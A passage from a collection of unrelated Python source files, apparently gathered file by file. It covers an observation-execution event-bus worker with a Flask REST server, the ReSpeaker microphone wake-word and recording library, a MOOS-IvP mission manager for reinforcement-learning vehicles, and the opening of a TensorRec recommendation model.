to and publish messages, and these messages will put on the main queue to
be broadcast to other EventBusWorkers.
"""
def startup(self) -> None:
# Call super.startup to enable pypubsub <-> event queue republishing
super().startup()
app = restserver.create_app(None)
# add route to run shutdown_flask() when /shutdown is accessed
app.add_url_rule("/shutdown", "shutdown", self.shutdown_flask, methods=["POST"])
# override default msg_src with our real process name
app.config.update(msg_src=self.name)
# start Flask in a thread as app.run is a blocking call
self.flask = threading.Thread(target=app.run, kwargs=dict(host="0.0.0.0"))
self.flask.start()
def shutdown(self) -> None:
# Call super.shutdown to disconnect from pypubsub
super().shutdown()
# flask can only be shut down by accessing a special Werkzeug function
# that is accessible from a request. Hence, we send a request to a
# special URL that will access and call that function.
requests.post("http://127.0.0.1:5000/shutdown")
self.flask.join(timeout=3)
super().shutdown()
@staticmethod
def shutdown_flask():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
return "Stopping Flask"
class ScriptExecutionServiceWorker(EventBusWorker):
"""
ScriptExecutionService listens for user request messages, calling the
appropriate ScriptExecutionService function and broadcasting its response.
Actions that occur in the user request domain ('user clicked start
observation', 'user aborted observation using the CLI', etc.) are
broadcast as events. ScriptExecutionServiceWorker listens for events on
these topics and triggers the required action in the script execution
domain ('start a script', 'abort a script', etc.).
Currently, the result of the action that occurred in the script execution
domain (=the return object from the ScriptExecutionService) is broadcast
    to the world by the ScriptExecutionServiceWorker. This could change so
that the ScriptExecutionService itself sends the message.
"""
def prepare(self, msg_src, request_id: str, cmd: PrepareProcessCommand):
self.log(logging.DEBUG, "Prepare procedure request %s: %s", request_id, cmd)
try:
summary = self.ses.prepare(cmd)
except (FileNotFoundError, ValueError) as e:
# ValueError raised on invalid URI prefix
# FileNotFoundError raised when file not found.
self.log(logging.INFO, "Prepare procedure %s failed: %s", request_id, e)
# TODO create failure topic for failures in procedure domain
self.send_message(
topics.procedure.lifecycle.created, request_id=request_id, result=e
)
else:
self.log(
logging.DEBUG, "Prepare procedure %s result: %s", request_id, summary
)
self.send_message(
topics.procedure.lifecycle.created,
request_id=request_id,
result=summary,
)
def start(self, msg_src, request_id: str, cmd: StartProcessCommand):
self.log(logging.DEBUG, "Start procedure request %s: %s", request_id, cmd)
summary = self.ses.start(cmd)
self.log(logging.DEBUG, "Start procedure %s result: %s", request_id, summary)
self.send_message(
topics.procedure.lifecycle.started, request_id=request_id, result=summary
)
def list(self, msg_src, request_id: str, pids=None):
self.log(logging.DEBUG, "List procedures for request %s", request_id)
try:
summaries = self.ses.summarise(pids)
except ValueError:
# ValueError raised when PID not found.
summaries = []
self.log(logging.DEBUG, "List result: %s", summaries)
self.send_message(
topics.procedure.pool.list, request_id=request_id, result=summaries
)
def stop(self, msg_src, request_id: str, cmd: StopProcessCommand):
self.log(logging.DEBUG, "Stop procedure request %s: %s", request_id, cmd)
try:
summary = self.ses.stop(cmd)
except FileNotFoundError as e:
# FileNotFoundError raised when abort.py script not found
self.log(logging.INFO, "Stop procedure %s failed: %s", request_id, e)
# TODO create failure topic for failures in procedure domain
# (or refactor abortion script creation so that FileNotFound
# is caught only once in prepare)
self.send_message(
topics.procedure.lifecycle.stopped, request_id=request_id, result=e
)
else:
self.log(logging.DEBUG, "Stop result: %s", summary)
self.send_message(
topics.procedure.lifecycle.stopped,
request_id=request_id,
result=summary,
)
def startup(self) -> None:
super().startup()
self.ses = ScriptExecutionService()
# wire up topics to the corresponding SES methods
pub.subscribe(self.prepare, topics.request.procedure.create)
pub.subscribe(self.start, topics.request.procedure.start)
pub.subscribe(self.list, topics.request.procedure.list)
pub.subscribe(self.stop, topics.request.procedure.stop)
def shutdown(self) -> None:
pub.unsubscribe(self.prepare, pub.ALL_TOPICS)
pub.unsubscribe(self.start, pub.ALL_TOPICS)
pub.unsubscribe(self.list, pub.ALL_TOPICS)
pub.unsubscribe(self.stop, pub.ALL_TOPICS)
super().shutdown()
def main():
"""
Create the OET components and start an event loop that dispatches messages
between them.
"""
# All queues and processes are created via a MainContext so that they are
# shared correctly and have consistent lifecycle management
with MainContext() as main_ctx:
# wire SIGINT and SIGTERM signal handlers to the shutdown_event Event
# monitored by all processes, so that the processes know when
# application termination has been requested.
init_signals(
main_ctx.shutdown_event, default_signal_handler, default_signal_handler
)
# create our message queues:
        # script_executor_q is the queue for messages intended for the ScriptExecutionServiceWorker process
# flask_q is the queue for messages intended for the FlaskWorker process
script_executor_q = main_ctx.MPQueue()
flask_q = main_ctx.MPQueue()
# event bus messages received on the event_queue (the main queue that
# child processes push to and which the while loop below listens to)
# will be pushed onto the queues in this list
event_bus_queues = [script_executor_q, flask_q]
# create the OET components, which will run in child Python processes
# and monitor the message queues here for event bus messages
main_ctx.Proc("SESWorker", ScriptExecutionServiceWorker, script_executor_q)
main_ctx.Proc("FlaskWorker", FlaskWorker, flask_q)
# with all workers and queues set up, start processing messages
main_loop(main_ctx, event_bus_queues)
def main_loop(main_ctx: MainContext, event_bus_queues: List[MPQueue]):
"""
Main message parsing and routing loop, extracted from main() to increase
testability.
:param main_ctx:
:param event_bus_queues:
:return:
"""
while not main_ctx.shutdown_event.is_set():
event = main_ctx.event_queue.safe_get()
if not event:
continue
elif event.msg_type == "PUBSUB":
for q in event_bus_queues:
q.put(event)
elif event.msg_type == "FATAL":
main_ctx.log(logging.INFO, f"Fatal Event received: {event.msg}")
break
elif event.msg_type == "END":
main_ctx.log(logging.INFO, f"Shutdown Event received: {event.msg}")
break
else:
main_ctx.log(logging.ERROR, f"Unknown Event: {event}")
if __name__ == "__main__":
main()
|
microphone.py
|
"""
ReSpeaker Python Library
Copyright (c) 2016 Seeed Technology Limited.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import wave
import types
import collections
import random
import string
import logging
from threading import Thread, Event
try: # Python 2
import Queue
except: # Python 3
import queue as Queue
import pyaudio
from respeaker.pixel_ring import pixel_ring
from respeaker.vad import vad
logger = logging.getLogger('mic')
collecting_audio = os.getenv('COLLECTING_AUDIO', 'no')
def random_string(length):
return ''.join(random.choice(string.digits) for _ in range(length))
def save_as_wav(data, prefix):
prefix = prefix.replace(' ', '_')
filename = prefix + random_string(8) + '.wav'
while os.path.isfile(filename):
filename = prefix + random_string(8) + '.wav'
f = wave.open(filename, 'wb')
f.setframerate(16000)
f.setsampwidth(2)
f.setnchannels(1)
f.writeframes(data)
f.close()
logger.info('Save audio as %s' % filename)
class Microphone:
sample_rate = 16000
frames_per_buffer = 512
listening_mask = (1 << 0)
detecting_mask = (1 << 1)
recording_mask = (1 << 2)
def __init__(self, pyaudio_instance=None, quit_event=None, decoder=None):
pixel_ring.set_color(rgb=0x400000)
self.pyaudio_instance = pyaudio_instance if pyaudio_instance else pyaudio.PyAudio()
self.device_index = None
for i in range(self.pyaudio_instance.get_device_count()):
dev = self.pyaudio_instance.get_device_info_by_index(i)
name = dev['name'].encode('utf-8')
# print(i, name, dev['maxInputChannels'], dev['maxOutputChannels'])
if name.lower().find(b'respeaker') >= 0 and dev['maxInputChannels'] > 0:
logger.info('Use {}'.format(name))
self.device_index = i
break
        # Use "is None" so a valid device index of 0 is not mistaken for "not found".
        if self.device_index is None:
device = self.pyaudio_instance.get_default_input_device_info()
self.device_index = device['index']
self.stream = self.pyaudio_instance.open(
input=True,
start=False,
format=pyaudio.paInt16,
channels=1,
rate=self.sample_rate,
frames_per_buffer=self.frames_per_buffer,
stream_callback=self._callback,
input_device_index=self.device_index,
)
self.quit_event = quit_event if quit_event else Event()
self.listen_queue = Queue.Queue()
self.detect_queue = Queue.Queue()
self.decoder = decoder if decoder else self.create_decoder()
self.decoder.start_utt()
self.status = 0
self.active = False
self.listen_history = collections.deque(maxlen=8)
self.detect_history = collections.deque(maxlen=48)
self.wav = None
self.record_countdown = None
self.listen_countdown = [0, 0]
@staticmethod
def create_decoder():
from pocketsphinx.pocketsphinx import Decoder
path = os.path.dirname(os.path.realpath(__file__))
pocketsphinx_data = os.getenv('POCKETSPHINX_DATA', os.path.join(path, 'pocketsphinx-data'))
hmm = os.getenv('POCKETSPHINX_HMM', os.path.join(pocketsphinx_data, 'hmm'))
        # Avoid shadowing the built-in "dict" with the dictionary file path.
        dict_path = os.getenv('POCKETSPHINX_DIC', os.path.join(pocketsphinx_data, 'dictionary.txt'))
        kws = os.getenv('POCKETSPHINX_KWS', os.path.join(pocketsphinx_data, 'keywords.txt'))
        config = Decoder.default_config()
        config.set_string('-hmm', hmm)
        config.set_string('-dict', dict_path)
config.set_string('-kws', kws)
# config.set_int('-samprate', SAMPLE_RATE) # uncomment if rate is not 16000. use config.set_float() on ubuntu
config.set_int('-nfft', 512)
config.set_float('-vad_threshold', 2.7)
config.set_string('-logfn', os.devnull)
return Decoder(config)
def recognize(self, data):
self.decoder.end_utt()
self.decoder.start_utt()
if not data:
return ''
if isinstance(data, types.GeneratorType):
for d in data:
self.decoder.process_raw(d, False, False)
else:
self.decoder.process_raw(data, False, True)
hypothesis = self.decoder.hyp()
if hypothesis:
logger.info('Recognized {}'.format(hypothesis.hypstr))
return hypothesis.hypstr
return ''
def detect(self, keyword=None):
self.decoder.end_utt()
self.decoder.start_utt()
pixel_ring.off()
self.detect_history.clear()
self.detect_queue.queue.clear()
self.status |= self.detecting_mask
self.stream.start_stream()
result = None
logger.info('Start detecting')
while not self.quit_event.is_set():
size = self.detect_queue.qsize()
if size > 4:
logger.info('Too many delays, {} in queue'.format(size))
data = self.detect_queue.get()
self.detect_history.append(data)
self.decoder.process_raw(data, False, False)
hypothesis = self.decoder.hyp()
if hypothesis:
logger.info('Detected {}'.format(hypothesis.hypstr))
if collecting_audio != 'no':
logger.debug(collecting_audio)
save_as_wav(b''.join(self.detect_history), hypothesis.hypstr)
self.detect_history.clear()
if keyword:
if hypothesis.hypstr.find(keyword) >= 0:
result = hypothesis.hypstr
break
else:
self.decoder.end_utt()
self.decoder.start_utt()
self.detect_history.clear()
else:
result = hypothesis.hypstr
break
self.status &= ~self.detecting_mask
self.stop()
return result
wakeup = detect
def listen(self, duration=9, timeout=3):
vad.reset()
        # Integer division keeps the countdowns as ints under Python 3 as well.
        self.listen_countdown[0] = (duration * self.sample_rate + self.frames_per_buffer - 1) // self.frames_per_buffer
        self.listen_countdown[1] = (timeout * self.sample_rate + self.frames_per_buffer - 1) // self.frames_per_buffer
self.listen_queue.queue.clear()
self.status |= self.listening_mask
self.start()
pixel_ring.listen()
logger.info('Start listening')
def _listen():
try:
data = self.listen_queue.get(timeout=timeout)
while data and not self.quit_event.is_set():
yield data
data = self.listen_queue.get(timeout=timeout)
except Queue.Empty:
pass
self.stop()
return _listen()
def record(self, file_name, seconds=1800):
self.wav = wave.open(file_name, 'wb')
self.wav.setsampwidth(2)
self.wav.setnchannels(1)
self.wav.setframerate(self.sample_rate)
        self.record_countdown = (seconds * self.sample_rate + self.frames_per_buffer - 1) // self.frames_per_buffer
self.status |= self.recording_mask
self.start()
def quit(self):
self.status = 0
self.quit_event.set()
self.listen_queue.put('')
if self.wav:
self.wav.close()
self.wav = None
def start(self):
if self.stream.is_stopped():
self.stream.start_stream()
def stop(self):
if not self.status and self.stream.is_active():
self.stream.stop_stream()
def close(self):
self.quit()
self.stream.close()
def _callback(self, in_data, frame_count, time_info, status):
        # Recording is handled at the end of this callback.
if self.status & self.detecting_mask:
self.detect_queue.put(in_data)
if self.status & self.listening_mask:
active = vad.is_speech(in_data)
if active:
if not self.active:
for d in self.listen_history:
self.listen_queue.put(d)
self.listen_countdown[0] -= 1
self.listen_history.clear()
self.listen_queue.put(in_data)
self.listen_countdown[0] -= 1
else:
if self.active:
self.listen_queue.put(in_data)
else:
self.listen_history.append(in_data)
self.listen_countdown[1] -= 1
if self.listen_countdown[0] <= 0 or self.listen_countdown[1] <= 0:
self.listen_queue.put('')
self.status &= ~self.listening_mask
pixel_ring.wait()
logger.info('Stop listening')
self.active = active
if self.status & self.recording_mask:
self.wav.writeframes(in_data)
self.record_countdown -= 1
if self.record_countdown <= 0:
self.status &= ~self.recording_mask
self.wav.close()
return None, pyaudio.paContinue
def task(quit_event):
import time
mic = Microphone(quit_event=quit_event)
while not quit_event.is_set():
if mic.wakeup('respeaker'):
print('Wake up')
data = mic.listen()
text = mic.recognize(data)
if text:
time.sleep(3)
print('Recognized %s' % text)
def main():
import time
logging.basicConfig(level=logging.DEBUG)
q = Event()
t = Thread(target=task, args=(q,))
t.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print('Quit')
q.set()
break
t.join()
def test_record():
import time
mic = Microphone()
mic.record('hello.wav', seconds=3)
time.sleep(3)
mic.quit()
if __name__ == '__main__':
main()
|
manager.py
|
import time
from queue import Queue
from threading import Thread, Lock
from mivp_agent.const import KEY_ID
from mivp_agent.const import KEY_EPISODE_MGR_REPORT, KEY_EPISODE_MGR_STATE
from mivp_agent.bridge import ModelBridgeServer
from mivp_agent.util.validate import validateAction
from mivp_agent.util.parse import parse_report
INSTR_SEND_STATE = {
'speed': 0.0,
'course': 0.0,
'posts': {},
'ctrl_msg': 'SEND_STATE'
}
INSTR_START = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=start'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_PAUSE = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=pause'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_STOP = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=hardstop'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_RESET_SUCCESS = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=reset,success=true'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_RESET_FAILURE = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=reset,success=false'
},
'ctrl_msg': 'SEND_STATE'
}
class MissionManager:
'''
    This is the primary class for interfacing with moos-ivp-agent's BHV_Agent
Examples:
It is recommended to use MissionManager with the python context manager
```
from mivp_agent.manager import MissionManager
with MissionManager() as mgr:
mgr.wait_for(['felix', 'evan'])
...
```
'''
def __init__(self):
self._msg_queue = Queue()
self._vnames = []
self._vname_lock = Lock()
self._vehicle_count = 0
self._episode_manager_states = {}
self._ems_lock = Lock()
self._episode_manager_nums = {}
self._emn_lock = Lock()
        # Queue of (vname, success) tuples for vehicles awaiting reset
self._vresets = Queue()
self._thread = None
self._stop_signal = False
def __enter__(self):
self.start()
return self
def start(self):
'''
It is **not recommended** to use this method directly. Instead, consider using this class with the python context manager. This method starts a thread to read from the `ModelBridgeServer`.
Returns:
bool: False if thread has already been started, True otherwise
'''
if self._thread is not None:
return False
self._thread = Thread(target=self._server_thread, daemon=True)
self._thread.start()
return True
def _server_thread(self):
live_msg_list = []
address_map = {}
with ModelBridgeServer() as server:
while not self._stop_signal:
# Accept new clients
addr = server.accept()
if addr is not None:
print(f'Got new connection: {addr}')
server.send_instr(addr, INSTR_SEND_STATE)
# Listen for messages from vehicles
for addr in server._clients:
msg = server.listen(addr)
if msg is not None:
with self._vname_lock:
if msg[KEY_ID] not in self._vnames:
print(f'Got new vehicle: {msg[KEY_ID]}')
vname = msg[KEY_ID]
address_map[vname] = addr
self._vnames.append(vname)
self._vehicle_count += 1
m = MissionMessage(addr, msg)
with self._ems_lock:
self._episode_manager_states[m.vname] = m.episode_state
with self._emn_lock:
if m.episode_report is None:
self._episode_manager_nums[m.vname] = None
else:
self._episode_manager_nums[m.vname] = m.episode_report['NUM']
live_msg_list.append(m)
self._msg_queue.put(m)
# Send responses to vehicle message if there are any
for i, m in enumerate(live_msg_list):
with m._rsp_lock:
if m._response is None:
continue
                        # If a response has been set, send it and remove the message from the list
live_msg_list.remove(m)
server.send_instr(m._addr, m._response)
                # Handle resetting of vehicles
while not self._vresets.empty():
vname, success = self._vresets.get()
if vname not in address_map:
raise RuntimeError(
                            f'Received reset for unknown vehicle: {vname}')
instr = INSTR_RESET_FAILURE
if success:
instr = INSTR_RESET_SUCCESS
server.send_instr(address_map[vname], instr)
def are_present(self, vnames):
'''
Used to see if a specified list of vehicles has connected to the `MissionManager` instance yet.
See also: [`wait_for()`][mivp_agent.manager.MissionManager.wait_for]
Args:
vnames (iterable): A list / tuple of `str` values to look for
'''
for vname in vnames:
with self._vname_lock:
if vname not in self._vnames:
return False
return True
def wait_for(self, vnames, sleep=0.1):
'''
        Used to block until a specified list of vehicles has connected to the `MissionManager` instance.
Args:
vnames (iterable): A list / tuple of `str` values to look for
sleep (float): Amount of time in seconds to sleep for between checks
'''
while not self.are_present(vnames):
time.sleep(sleep)
def get_message(self, block=True):
'''
Used as the primary method for receiving data from `BHV_Agent`.
**NOTE:** Messages **MUST** be responded to as `BHV_Agent` will not send another update until it has a response to the last.
Args:
block (bool): A boolean specifying if the method will wait until a message present or return immediately
Returns:
            obj: An instance of [`MissionMessage()`][mivp_agent.manager.MissionMessage] or `None` depending on the blocking behavior
Example:
```
msg = mgr.get_message()
NAV_X = msg.state['NAV_X']
NAV_Y = msg.state['NAV_Y']
# ...
# Some processing
# ...
            msg.act({
                'speed': 1.0,
                'course': 180.0
            })
```
'''
return self._msg_queue.get(block=block)
def get_vehicle_count(self):
'''
Returns:
int: The amount of vehicles that have connected to this instance of `MissionManager`
'''
return self._vehicle_count
def episode_state(self, vname):
'''
This is used to interrogate the state of a connected vehicle's `pEpisodeManager`
Args:
vname (str): the vname of the vehicle
Returns:
str: The state of the `pEpisodeManager` on the vehicle
'''
with self._ems_lock:
            # Values are plain strings, so returning them directly causes no shared-reference issues
return self._episode_manager_states[vname]
def episode_nums(self):
'''
Returns:
            dict: A mapping from vnames to the episode numbers of the `pEpisodeManager` app on that vehicle
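        Example:
            A minimal sketch (vehicle names and episode numbers here are illustrative):
            ```
            nums = mgr.episode_nums()
            # e.g. {'felix': 12, 'evan': None}
            ```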
'''
with self._emn_lock:
return self._episode_manager_nums.copy()
    def reset_vehicle(self, vname, success=False):
        # Untested
        # _vresets is a Queue, so use put() rather than list-style append().
        self._vresets.put((vname, success))
def close(self):
if self._thread is not None:
self._stop_signal = True
self._thread.join()
def __exit__(self, exc_type, exc_value, traceback):
self.close()
class MissionMessage:
'''
    This class is used to parse incoming messages into attributes (see below) and provide a simple interface for responding to each message.
    **IMPORTANT NOTE:** Messages **MUST** be responded to by one of the following methods, as `BHV_Agent` will not send another update until it has a response to the last.
- [`act(action)`][mivp_agent.manager.MissionMessage.act] **<---- Most common**
- [`request_new()`][mivp_agent.manager.MissionMessage.request_new]
- [`start()`][mivp_agent.manager.MissionMessage.start]
- [`pause()`][mivp_agent.manager.MissionMessage.pause]
- [`stop()`][mivp_agent.manager.MissionMessage.stop]
Attributes:
vname (str): The vehicle's name which generated the message.
state (dict): A dictionary containing key, value pairs of MOOS vars and their associated value at the time the message was created by `BHV_Agent`.
episode_report (dict or None): If `pEpisodeManager` is present on the vehicle this message will contain any "report" generated by it at the end of episodes. If no `pEpisodeManager` is present, the **value will be** `None`.
episode_state (str or None): If `pEpisodeManager` is present on the vehicle this message will be the state which that app is broadcasting. Otherwise, it will be `None`.
'''
def __init__(self, addr, msg):
        # For use by MissionManager
self._addr = addr
self._response = None
self._rsp_lock = Lock()
# For use by client
self.state = msg
self.vname = msg[KEY_ID]
self.episode_report = None
self.episode_state = None
if self.state[KEY_EPISODE_MGR_REPORT] is not None:
self.episode_report = parse_report(
self.state[KEY_EPISODE_MGR_REPORT])
if self.state[KEY_EPISODE_MGR_STATE] is not None:
self.episode_state = self.state[KEY_EPISODE_MGR_STATE]
def _assert_no_rsp(self):
assert self._response is None, 'This message has already been responded to'
def act(self, action):
'''
This is used to send an action for the `BHV_Agent` to execute.
Args:
action (dict): An action to send (see below)
Example:
Actions submitted through `MissionMessage` are python dictionaries with the following **required** fields.
```
            msg.act({
                'speed': 1.0,
                'course': 180.0
            })
```
Example:
Optionally, one can add a MOOS var and value they would like to post.
```
            msg.act({
                'speed': 0.0,
                'course': 0.0,
                'posts': {
                    'ACTION': 'ATTACK_LEFT'
                },
            })
```
'''
self._assert_no_rsp()
# Copy so we don't run into threading errors if client reuses the action dict
instr = action.copy()
if 'posts' not in action:
instr['posts'] = {}
validateAction(instr)
instr['ctrl_msg'] = 'SEND_STATE'
with self._rsp_lock:
self._response = instr
def start(self):
'''
This method is used to send a message to `pEpisodeManager` to **start** an episode. The following message will be constructed and dispatched.
```
{
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=start'
},
}
```
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_START
def pause(self):
'''
        This method is used to send a message to `pEpisodeManager` to **pause** after the current episode. The following message will be constructed and dispatched.
```
{
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=pause'
},
}
```
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_PAUSE
def stop(self):
'''
        This method is used to send a message to `pEpisodeManager` to **hardstop** an episode immediately. The following message will be constructed and dispatched.
```
{
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=hardstop'
},
}
```
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_STOP
def request_new(self):
'''
        This method is used to ask `BHV_Agent` to send another action.
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_SEND_STATE
|
tensorrec.py
|
import logging
import numpy as np
import os,sys
import pickle
import time
import tensorflow as tf
import threading, thread
import multiprocessing
import itertools
from .errors import (
TfVersionException
)
from .input_utils import create_tensorrec_iterator, get_dimensions_from_tensorrec_dataset
from .loss_graphs import AbstractLossGraph, WMRBLossGraph
from .prediction_graphs import AbstractPredictionGraph, CosineSimilarityPredictionGraph
from .representation_graphs import AbstractRepresentationGraph, LinearRepresentationGraph
from .session_management import get_session
from .util import (variable_summaries, get_memory, multiple_workers, multiple_workers_thread, stop_subprocess, get_queue_size)
class TensorRec(object):
def __init__(self,
n_components=100,
n_tastes=1,
user_repr_graph=LinearRepresentationGraph(),
item_repr_graph=LinearRepresentationGraph(),
attention_graph=None,
prediction_graph=CosineSimilarityPredictionGraph(),
loss_graph=WMRBLossGraph(),
biased=False,
stratified_sample=False,
log_interval=100,
logdir='.',):
"""
A TensorRec recommendation model.
:param n_components: Integer
The dimension of a single output of the representation function. Must be >= 1.
:param n_tastes: Integer
The number of tastes/reprs to be calculated for each user. Must be >= 1.
:param user_repr_graph: AbstractRepresentationGraph
An object which inherits AbstractRepresentationGraph that contains a method to calculate user representations.
See tensorrec.representation_graphs for examples.
:param item_repr_graph: AbstractRepresentationGraph
An object which inherits AbstractRepresentationGraph that contains a method to calculate item representations.
See tensorrec.representation_graphs for examples.
:param attention_graph: AbstractRepresentationGraph or None
Optional. An object which inherits AbstractRepresentationGraph that contains a method to calculate user
attention. Any valid repr_graph is also a valid attention graph. If None, no attention process will be applied.
:param prediction_graph: AbstractPredictionGraph
An object which inherits AbstractPredictionGraph that contains a method to calculate predictions from a pair of
user/item reprs.
See tensorrec.prediction_graphs for examples.
:param loss_graph: AbstractLossGraph
An object which inherits AbstractLossGraph that contains a method to calculate the loss function.
See tensorrec.loss_graphs for examples.
:param biased: bool
If True, a bias value will be calculated for every user feature and item feature.
"""
# Check TensorFlow version
major, minor, patch = tf.__version__.split(".")
if int(major) < 1 or int(major) == 1 and int(minor) < 7:
raise TfVersionException(tf_version=tf.__version__)
# Arg Check
if (n_components is None) or (n_tastes is None) or (user_repr_graph is None) or (item_repr_graph is None) \
or (prediction_graph is None) or (loss_graph is None):
raise ValueError("All arguments to TensorRec() must be non-None")
if n_components < 1:
raise ValueError("n_components must be >= 1")
if n_tastes < 1:
raise ValueError("n_tastes must be >= 1")
if not isinstance(user_repr_graph, AbstractRepresentationGraph):
raise ValueError("user_repr_graph must inherit AbstractRepresentationGraph")
if not isinstance(item_repr_graph, AbstractRepresentationGraph):
raise ValueError("item_repr_graph must inherit AbstractRepresentationGraph")
if not isinstance(prediction_graph, AbstractPredictionGraph):
raise ValueError("prediction_graph must inherit AbstractPredictionGraph")
if not isinstance(loss_graph, AbstractLossGraph):
raise ValueError("loss_graph must inherit AbstractLossGraph")
if attention_graph is not None:
if not isinstance(attention_graph, AbstractRepresentationGraph):
raise ValueError("attention_graph must be None or inherit AbstractRepresentationGraph")
if n_tastes == 1:
raise ValueError("attention_graph must be None if n_tastes == 1")
self.n_components = n_components
self.n_tastes = n_tastes
self.user_repr_graph_factory = user_repr_graph
self.item_repr_graph_factory = item_repr_graph
self.attention_graph_factory = attention_graph
self.prediction_graph_factory = prediction_graph
self.loss_graph_factory = loss_graph
self.biased = biased
self.stratified_sample = stratified_sample
self.log_interval = log_interval
self.logdir = logdir
self.graph_nodes = {}
self.memory_var = None
self.active_train_thread = None
self.neg_sample_limit = 100
self.truncate_interval=1000
self.coord = None
self.input_step_size = 1000
self.sub_process = []
self.queue_input = None
self.queue_output = None
self.queue_input_cap = 100
self.queue_output_cap = 100
self.gen_ex_n_worker = 1
self.tf_enqueue_n_worker = 1
self.tf_queue_cap = 1000
def _build_tf_graph(self, n_user_features, n_item_features, tf_learning_rate=0.01, tf_alpha=0.00001, margin=0.2, use_reg=False):
# Build placeholders
self.tf_learning_rate = tf.constant(tf_learning_rate, name='lr_rate') #tf.placeholder(tf.float32, None, name='learning_rate')
self.tf_alpha = tf.constant(tf_alpha, name='alpha') #tf.placeholder(tf.float32, None, name='alpha')
self.margin = tf.constant(margin, name='margin') #tf.placeholder(tf.float32, None, name='margin')
# self.negSearchLimit = tf.placeholder(tf.int32, None, name='negSearchLimit')
with tf.name_scope('feed_user_feature'):
self.tf_user_feature_cols = tf.placeholder(tf.int32, [None], name='tf_user_feature_cols')
with tf.name_scope('feed_interaction'):
self.tf_interaction_words_user = tf.placeholder(tf.int32, [None], name='tf_interaction_words_user')
self.tf_interaction_words_pos = tf.placeholder(tf.int32, [None], name='tf_interaction_words_pos')
with tf.name_scope('neg_example'):
self.tf_interaction_words_neg = tf.placeholder(tf.int32, [None], name='tf_interaction_words_neg')
self.tf_interaction_words_neg_len = tf.placeholder(tf.int32, [None], name='tf_interaction_words_neg_len')
# self.graph_nodes['test'] = tf.reduce_sum(self.tf_user_feature_cols) + tf.reduce_sum(self.tf_interaction_cols)
q = tf.PaddingFIFOQueue(capacity=self.tf_queue_cap, dtypes=[tf.int32, tf.int32, tf.int32, tf.int32, tf.int32],
shapes=[[None], [None], [None], [None], [self.neg_sample_limit]], name='padding_queue')
self.queue = q
enqueue_op = q.enqueue([self.tf_user_feature_cols, self.tf_interaction_words_user,
self.tf_interaction_words_pos, self.tf_interaction_words_neg,
self.tf_interaction_words_neg_len], name='enqueue')
self.graph_nodes['enqueue'] = enqueue_op
input_batch = q.dequeue(name='dequeue') # It replaces our input placeholder
user_features, words_user, words_pos, words_neg, words_neg_len = input_batch
self.graph_nodes['dequeue'] = input_batch
self.graph_nodes['q_size'] = q.size(name='q_size')
        # Collect the variables used when computing regularization
# item feature variable
_, item_weights = \
self.item_repr_graph_factory.connect_representation_graph(feature_weights=[self.graph_nodes.get('item_weights')],
tf_features=[0],
n_components=self.n_components,
n_features=n_item_features,
node_name_ending='item',
lookup=True)
#reg_vars.extend(item_weights)
self.graph_nodes['item_weights'] = item_weights[0]
self.tf_word_representation = item_weights[0]
print 'tf_word_representation', self.tf_word_representation
print 'item_weights', item_weights[0]
# user feature variable
user_weights = self.graph_nodes.get('user_weights')
tf_user_representation_feature, user_weights = self.user_repr_graph_factory.connect_representation_graph(
feature_weights=[user_weights],
tf_features=user_features, n_components=self.n_components, n_features=n_user_features,
node_name_ending='user', lookup=True)
self.graph_nodes['tf_user_representation_feature'] = tf_user_representation_feature
self.graph_nodes['user_weights'] = user_weights[0]
print 'tf_user_representation_feature', tf_user_representation_feature
print 'user_weights', user_weights[0]
with tf.name_scope('pos_example'):
pos_item_representation = tf.reshape(tf.reduce_sum(tf.nn.embedding_lookup(self.tf_word_representation, words_pos, name='pos_repr'), axis=0), shape=(1,-1))
self.graph_nodes['pos_item_representation'] = pos_item_representation
print 'pos_item_representation', pos_item_representation
# user representation
# user interation history representation
with tf.name_scope('final_user_repr'):
user_interaction_items_repr = tf.reduce_sum(tf.nn.embedding_lookup(self.tf_word_representation,
words_user,
name='lookup_interaction'), axis=0)
self.tf_user_representation = tf_user_representation_feature + user_interaction_items_repr
print 'user_interaction_items_repr', user_interaction_items_repr
print 'self.tf_user_representation', self.tf_user_representation
self.graph_nodes['tf_user_representation'] = self.tf_user_representation
self.graph_nodes['tf_user_representation_feature'] = tf_user_representation_feature
# negative examples
with tf.name_scope('neg_examples'):
neg_items = tf.split(words_neg, words_neg_len, name='neg_split')
neg_items_representation = tf.stack([tf.reduce_sum(tf.nn.embedding_lookup(self.tf_word_representation,words,name='lookup_neg'),
axis=0) for words in neg_items])
print 'neg_items_representation', neg_items_representation
self.graph_nodes['neg_item_representation'] = neg_items_representation
with tf.name_scope('words_cnt'):
self.graph_nodes['words_cnt'] = tf.shape(words_user)[0] + tf.shape(words_pos)[0] + tf.shape(words_neg)[0]
# Compose loss function args
# This composition is for execution safety: it prevents loss functions that are incorrectly configured from
# having visibility of certain nodes.
loss_graph_kwargs = {
'prediction_graph_factory': self.prediction_graph_factory,
'tf_user_representation': self.tf_user_representation,
'neg_items_representation': neg_items_representation,
